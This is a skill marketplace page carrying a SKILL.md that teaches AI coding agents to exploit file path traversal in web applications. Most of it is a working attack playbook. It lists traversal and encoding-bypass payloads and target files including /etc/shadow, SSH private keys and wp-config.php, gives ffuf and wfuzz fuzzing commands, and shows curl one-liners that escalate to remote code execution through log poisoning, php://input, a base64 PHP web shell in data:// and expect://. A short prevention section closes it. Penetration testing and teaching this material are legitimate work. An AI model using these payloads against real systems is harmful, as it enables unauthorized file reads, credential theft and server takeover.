How do I install File Path Traversal Testing?

Install File Path Traversal Testing with a single command: npx mdskills install sickn33/file-path-traversal. This downloads the skill files into your project and your AI agent picks them up automatically.

What platforms support File Path Traversal Testing?

File Path Traversal Testing works with Claude Code, Claude Desktop, Cursor, Vscode Copilot, Windsurf, Continue Dev, Codex, Gemini Cli, Amp, Roo Code, Goose, Opencode, Trae, Qodo, Command Code. Skills use the open SKILL.md format which is compatible with any AI coding agent that reads markdown instructions.

← Back to skills

File Path Traversal Testing

Name: File Path Traversal Testing: AI Agent Skill
Rating: 8 (1 reviews)
Author: sickn33

Verified

Testing & QAIntermediate

This skill should be used when the user asks to "test for directory traversal", "exploit path traversal vulnerabilities", "read arbitrary files through web applications", "find LFI vulnerabilities", or "access files outside web root". It provides comprehensive file path traversal attack and testing methodologies.

by @sickn330Updated 2 weeks ago

Add this skill

npx mdskills install sickn33/file-path-traversal

Fork & Edit

Skill Advisor8.0

Comprehensive penetration testing guide with extensive payloads and bypass techniques

+Provides exhaustive traversal payloads and encoding variants across platforms
+Includes RCE escalation techniques and secure coding prevention examples
+Covers automated testing workflows with multiple tools (Burp, ffuf, wfuzz)
-Lacks clear trigger conditions or decision logic for when to apply techniques
-Requests shell execution permissions but doesn't specify commands or validation

SKILL.md

Edit in Browser

1---
2name: File Path Traversal Testing
3description: This skill should be used when the user asks to "test for directory traversal", "exploit path traversal vulnerabilities", "read arbitrary files through web applications", "find LFI vulnerabilities", or "access files outside web root". It provides comprehensive file path traversal attack and testing methodologies.
4metadata:
5  author: zebbern
6  version: "1.1"
7---
8 
9# File Path Traversal Testing
10 
11## Purpose
12 
13Identify and exploit file path traversal (directory traversal) vulnerabilities that allow attackers to read arbitrary files on the server, potentially including sensitive configuration files, credentials, and source code. This vulnerability occurs when user-controllable input is passed to filesystem APIs without proper validation.
14 
15## Prerequisites
16 
17### Required Tools
18- Web browser with developer tools
19- Burp Suite or OWASP ZAP
20- cURL for testing payloads
21- Wordlists for automation
22- ffuf or wfuzz for fuzzing
23 
24### Required Knowledge
25- HTTP request/response structure
26- Linux and Windows filesystem layout
27- Web application architecture
28- Basic understanding of file APIs
29 
30## Outputs and Deliverables
31 
321. **Vulnerability Report** - Identified traversal points and severity
332. **Exploitation Proof** - Extracted file contents
343. **Impact Assessment** - Accessible files and data exposure
354. **Remediation Guidance** - Secure coding recommendations
36 
37## Core Workflow
38 
39### Phase 1: Understanding Path Traversal
40 
41Path traversal occurs when applications use user input to construct file paths:
42 
43```php
44// Vulnerable PHP code example
45$template = "blue.php";
46if (isset($_COOKIE['template']) && !empty($_COOKIE['template'])) {
47    $template = $_COOKIE['template'];
48}
49include("/home/user/templates/" . $template);
50```
51 
52Attack principle:
53- `../` sequence moves up one directory
54- Chain multiple sequences to reach root
55- Access files outside intended directory
56 
57Impact:
58- **Confidentiality** - Read sensitive files
59- **Integrity** - Write/modify files (in some cases)
60- **Availability** - Delete files (in some cases)
61- **Code Execution** - If combined with file upload or log poisoning
62 
63### Phase 2: Identifying Traversal Points
64 
65Map application for potential file operations:
66 
67```bash
68# Parameters that often handle files
69?file=
70?path=
71?page=
72?template=
73?filename=
74?doc=
75?document=
76?folder=
77?dir=
78?include=
79?src=
80?source=
81?content=
82?view=
83?download=
84?load=
85?read=
86?retrieve=
87```
88 
89Common vulnerable functionality:
90- Image loading: `/image?filename=23.jpg`
91- Template selection: `?template=blue.php`
92- File downloads: `/download?file=report.pdf`
93- Document viewers: `/view?doc=manual.pdf`
94- Include mechanisms: `?page=about`
95 
96### Phase 3: Basic Exploitation Techniques
97 
98#### Simple Path Traversal
99 
100```bash
101# Basic Linux traversal
102../../../etc/passwd
103../../../../etc/passwd
104../../../../../etc/passwd
105../../../../../../etc/passwd
106 
107# Windows traversal
108..\..\..\windows\win.ini
109..\..\..\..\windows\system32\drivers\etc\hosts
110 
111# URL encoded
112..%2F..%2F..%2Fetc%2Fpasswd
113..%252F..%252F..%252Fetc%252Fpasswd  # Double encoding
114 
115# Test payloads with curl
116curl "http://target.com/image?filename=../../../etc/passwd"
117curl "http://target.com/download?file=....//....//....//etc/passwd"
118```
119 
120#### Absolute Path Injection
121 
122```bash
123# Direct absolute path (Linux)
124/etc/passwd
125/etc/shadow
126/etc/hosts
127/proc/self/environ
128 
129# Direct absolute path (Windows)
130C:\windows\win.ini
131C:\windows\system32\drivers\etc\hosts
132C:\boot.ini
133```
134 
135### Phase 4: Bypass Techniques
136 
137#### Bypass Stripped Traversal Sequences
138 
139```bash
140# When ../ is stripped once
141....//....//....//etc/passwd
142....\/....\/....\/etc/passwd
143 
144# Nested traversal
145..././..././..././etc/passwd
146....//....//etc/passwd
147 
148# Mixed encoding
149..%2f..%2f..%2fetc/passwd
150%2e%2e/%2e%2e/%2e%2e/etc/passwd
151%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
152```
153 
154#### Bypass Extension Validation
155 
156```bash
157# Null byte injection (older PHP versions)
158../../../etc/passwd%00.jpg
159../../../etc/passwd%00.png
160 
161# Path truncation
162../../../etc/passwd...............................
163 
164# Double extension
165../../../etc/passwd.jpg.php
166```
167 
168#### Bypass Base Directory Validation
169 
170```bash
171# When path must start with expected directory
172/var/www/images/../../../etc/passwd
173 
174# Expected path followed by traversal
175images/../../../etc/passwd
176```
177 
178#### Bypass Blacklist Filters
179 
180```bash
181# Unicode/UTF-8 encoding
182..%c0%af..%c0%af..%c0%afetc/passwd
183..%c1%9c..%c1%9c..%c1%9cetc/passwd
184 
185# Overlong UTF-8 encoding
186%c0%2e%c0%2e%c0%af
187 
188# URL encoding variations
189%2e%2e/
190%2e%2e%5c
191..%5c
192..%255c
193 
194# Case variations (Windows)
195....\\....\\etc\\passwd
196```
197 
198### Phase 5: Linux Target Files
199 
200High-value files to target:
201 
202```bash
203# System files
204/etc/passwd           # User accounts
205/etc/shadow           # Password hashes (root only)
206/etc/group            # Group information
207/etc/hosts            # Host mappings
208/etc/hostname         # System hostname
209/etc/issue            # System banner
210 
211# SSH files
212/root/.ssh/id_rsa           # Root private key
213/root/.ssh/authorized_keys  # Authorized keys
214/home/<user>/.ssh/id_rsa    # User private keys
215/etc/ssh/sshd_config        # SSH configuration
216 
217# Web server files
218/etc/apache2/apache2.conf
219/etc/nginx/nginx.conf
220/etc/apache2/sites-enabled/000-default.conf
221/var/log/apache2/access.log
222/var/log/apache2/error.log
223/var/log/nginx/access.log
224 
225# Application files
226/var/www/html/config.php
227/var/www/html/wp-config.php
228/var/www/html/.htaccess
229/var/www/html/web.config
230 
231# Process information
232/proc/self/environ      # Environment variables
233/proc/self/cmdline      # Process command line
234/proc/self/fd/0         # File descriptors
235/proc/version           # Kernel version
236 
237# Common application configs
238/etc/mysql/my.cnf
239/etc/postgresql/*/postgresql.conf
240/opt/lampp/etc/httpd.conf
241```
242 
243### Phase 6: Windows Target Files
244 
245Windows-specific targets:
246 
247```bash
248# System files
249C:\windows\win.ini
250C:\windows\system.ini
251C:\boot.ini
252C:\windows\system32\drivers\etc\hosts
253C:\windows\system32\config\SAM
254C:\windows\repair\SAM
255 
256# IIS files
257C:\inetpub\wwwroot\web.config
258C:\inetpub\logs\LogFiles\W3SVC1\
259 
260# Configuration files
261C:\xampp\apache\conf\httpd.conf
262C:\xampp\mysql\data\mysql\user.MYD
263C:\xampp\passwords.txt
264C:\xampp\phpmyadmin\config.inc.php
265 
266# User files
267C:\Users\<user>\.ssh\id_rsa
268C:\Users\<user>\Desktop\
269C:\Documents and Settings\<user>\
270```
271 
272### Phase 7: Automated Testing
273 
274#### Using Burp Suite
275 
276```
2771. Capture request with file parameter
2782. Send to Intruder
2793. Mark file parameter value as payload position
2804. Load path traversal wordlist
2815. Start attack
2826. Filter responses by size/content for success
283```
284 
285#### Using ffuf
286 
287```bash
288# Basic traversal fuzzing
289ffuf -u "http://target.com/image?filename=FUZZ" \
290     -w /usr/share/wordlists/traversal.txt \
291     -mc 200
292 
293# Fuzzing with encoding
294ffuf -u "http://target.com/page?file=FUZZ" \
295     -w /usr/share/seclists/Fuzzing/LFI/LFI-Jhaddix.txt \
296     -mc 200,500 -ac
297```
298 
299#### Using wfuzz
300 
301```bash
302# Traverse to /etc/passwd
303wfuzz -c -z file,/usr/share/seclists/Fuzzing/LFI/LFI-Jhaddix.txt \
304      --hc 404 \
305      "http://target.com/index.php?file=FUZZ"
306 
307# With headers/cookies
308wfuzz -c -z file,traversal.txt \
309      -H "Cookie: session=abc123" \
310      "http://target.com/load?path=FUZZ"
311```
312 
313### Phase 8: LFI to RCE Escalation
314 
315#### Log Poisoning
316 
317```bash
318# Inject PHP code into logs
319curl -A "<?php system(\$_GET['cmd']); ?>" http://target.com/
320 
321# Include Apache log file
322curl "http://target.com/page?file=../../../var/log/apache2/access.log&cmd=id"
323 
324# Include auth.log (SSH)
325# First: ssh '<?php system($_GET["cmd"]); ?>'@target.com
326curl "http://target.com/page?file=../../../var/log/auth.log&cmd=whoami"
327```
328 
329#### Proc/self/environ
330 
331```bash
332# Inject via User-Agent
333curl -A "<?php system('id'); ?>" \
334     "http://target.com/page?file=/proc/self/environ"
335 
336# With command parameter
337curl -A "<?php system(\$_GET['c']); ?>" \
338     "http://target.com/page?file=/proc/self/environ&c=whoami"
339```
340 
341#### PHP Wrapper Exploitation
342 
343```bash
344# php://filter - Read source code as base64
345curl "http://target.com/page?file=php://filter/convert.base64-encode/resource=config.php"
346 
347# php://input - Execute POST data as PHP
348curl -X POST -d "<?php system('id'); ?>" \
349     "http://target.com/page?file=php://input"
350 
351# data:// - Execute inline PHP
352curl "http://target.com/page?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjJ10pOyA/Pg==&c=id"
353 
354# expect:// - Execute system commands
355curl "http://target.com/page?file=expect://id"
356```
357 
358### Phase 9: Testing Methodology
359 
360Structured testing approach:
361 
362```bash
363# Step 1: Identify potential parameters
364# Look for file-related functionality
365 
366# Step 2: Test basic traversal
367../../../etc/passwd
368 
369# Step 3: Test encoding variations
370..%2F..%2F..%2Fetc%2Fpasswd
371%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
372 
373# Step 4: Test bypass techniques
374....//....//....//etc/passwd
375..;/..;/..;/etc/passwd
376 
377# Step 5: Test absolute paths
378/etc/passwd
379 
380# Step 6: Test with null bytes (legacy)
381../../../etc/passwd%00.jpg
382 
383# Step 7: Attempt wrapper exploitation
384php://filter/convert.base64-encode/resource=index.php
385 
386# Step 8: Attempt log poisoning for RCE
387```
388 
389### Phase 10: Prevention Measures
390 
391Secure coding practices:
392 
393```php
394// PHP: Use basename() to strip paths
395$filename = basename($_GET['file']);
396$path = "/var/www/files/" . $filename;
397 
398// PHP: Validate against whitelist
399$allowed = ['report.pdf', 'manual.pdf', 'guide.pdf'];
400if (in_array($_GET['file'], $allowed)) {
401    include("/var/www/files/" . $_GET['file']);
402}
403 
404// PHP: Canonicalize and verify base path
405$base = "/var/www/files/";
406$realBase = realpath($base);
407$userPath = $base . $_GET['file'];
408$realUserPath = realpath($userPath);
409 
410if ($realUserPath && strpos($realUserPath, $realBase) === 0) {
411    include($realUserPath);
412}
413```
414 
415```python
416# Python: Use os.path.realpath() and validate
417import os
418 
419def safe_file_access(base_dir, filename):
420    # Resolve to absolute path
421    base = os.path.realpath(base_dir)
422    file_path = os.path.realpath(os.path.join(base, filename))
423    
424    # Verify file is within base directory
425    if file_path.startswith(base):
426        return open(file_path, 'r').read()
427    else:
428        raise Exception("Access denied")
429```
430 
431## Quick Reference
432 
433### Common Payloads
434 
435| Payload | Target |
436|---------|--------|
437| `../../../etc/passwd` | Linux password file |
438| `..\..\..\..\windows\win.ini` | Windows INI file |
439| `....//....//....//etc/passwd` | Bypass simple filter |
440| `/etc/passwd` | Absolute path |
441| `php://filter/convert.base64-encode/resource=config.php` | Source code |
442 
443### Target Files
444 
445| OS | File | Purpose |
446|----|------|---------|
447| Linux | `/etc/passwd` | User accounts |
448| Linux | `/etc/shadow` | Password hashes |
449| Linux | `/proc/self/environ` | Environment vars |
450| Windows | `C:\windows\win.ini` | System config |
451| Windows | `C:\boot.ini` | Boot config |
452| Web | `wp-config.php` | WordPress DB creds |
453 
454### Encoding Variants
455 
456| Type | Example |
457|------|---------|
458| URL Encoding | `%2e%2e%2f` = `../` |
459| Double Encoding | `%252e%252e%252f` = `../` |
460| Unicode | `%c0%af` = `/` |
461| Null Byte | `%00` |
462 
463## Constraints and Limitations
464 
465### Permission Restrictions
466- Cannot read files application user cannot access
467- Shadow file requires root privileges
468- Many files have restrictive permissions
469 
470### Application Restrictions
471- Extension validation may limit file types
472- Base path validation may restrict scope
473- WAF may block common payloads
474 
475### Testing Considerations
476- Respect authorized scope
477- Avoid accessing genuinely sensitive data
478- Document all successful access
479 
480## Troubleshooting
481 
482| Problem | Solutions |
483|---------|-----------|
484| No response difference | Try encoding, blind traversal, different files |
485| Payload blocked | Use encoding variants, nested sequences, case variations |
486| Cannot escalate to RCE | Check logs, PHP wrappers, file upload, session poisoning |
487

Full transparency — inspect the skill content before installing.